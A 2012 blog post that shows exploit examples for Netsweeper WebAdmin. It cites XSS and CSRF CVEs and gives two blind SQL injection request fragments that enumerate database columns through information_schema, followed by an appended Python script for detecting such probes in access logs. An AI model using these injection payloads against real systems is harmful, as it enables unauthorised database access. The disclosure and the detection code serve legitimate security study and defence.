Wednesday, July 11, 2012

Hacking Netsweeper WebAdmin Exploit Example

Exploitation Example 1/2: CVE-2012-2446 for the XSS issues, CVE-2012-2447 for the CSRF





Exploitation Example 2/2: SQLi ("The later")

Error: does not exist
and (select case when(select substring(report,1,1) from information_schema.schemata limit 0,1) then null else null end)&type=demand&id=1441 


No Error: does exist
and (select case when(select substring(report_date,1,1) from information_schema.schemata limit 0,1) then null else null end)&type=demand&id=1441
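A detection-side view of the two requests above, as an added example that is not part of the original post: the probes differ only in the column name inside substring(), so masking that identifier and grouping by client exposes the enumeration in an access log. The path "/PLACEHOLDER", the parameter name "p" and the log entries are constructed assumptions; the page shows neither the path nor the parameter name.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed log sample: (client IP, request URL). "/PLACEHOLDER" and the
# parameter name "p" are assumptions, not values taken from the page.
TAIL = "&type=demand&id=1441"
SAMPLE_LOG = [
    ("203.0.113.7", "/PLACEHOLDER?p=1+and+(select+case+when(select+substring(report,1,1)"
                    "+from+information_schema.schemata+limit+0,1)+then+null+else+null+end)" + TAIL),
    ("203.0.113.7", "/PLACEHOLDER?p=1+and+(select+case+when(select+substring(report_date,1,1)"
                    "+from+information_schema.schemata+limit+0,1)+then+null+else+null+end)" + TAIL),
    ("198.51.100.20", "/PLACEHOLDER?p=1" + TAIL),                        # normal request
    ("198.51.100.20", "/PLACEHOLDER?p=select+a+plan+from+list" + TAIL),  # SQL words, no subquery
]

# A parenthesised SELECT ... FROM inside a parameter value.
SUBQUERY = re.compile(r"\(\s*select\b.*\bfrom\b", re.I | re.S)
# The identifier passed as first argument to substring().
IDENT_IN_CALL = re.compile(r"(substring\s*\(\s*)([A-Za-z_][\w.]*)", re.I)

def template_and_idents(value):
    """Return (value with probed identifiers masked, identifiers) or None."""
    if not SUBQUERY.search(value):
        return None
    idents = [m.group(2).lower() for m in IDENT_IN_CALL.finditer(value)]
    return IDENT_IN_CALL.sub(r"\1<ident>", value).lower(), idents

def find_enumeration(entries, min_distinct=2):
    """Report clients that replay one injected template with varying identifiers."""
    seen = defaultdict(set)  # (client, path, param, template) -> identifiers tried
    for client, url in entries:
        parts = urlsplit(url)
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            hit = template_and_idents(value)
            if hit:
                template, idents = hit
                seen[(client, parts.path, name, template)].update(idents)
    return [(c, path, name, sorted(ids))
            for (c, path, name, _), ids in seen.items() if len(ids) >= min_distinct]

if __name__ == "__main__":
    for finding in find_enumeration(SAMPLE_LOG):
        print("possible column enumeration:", finding)
```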

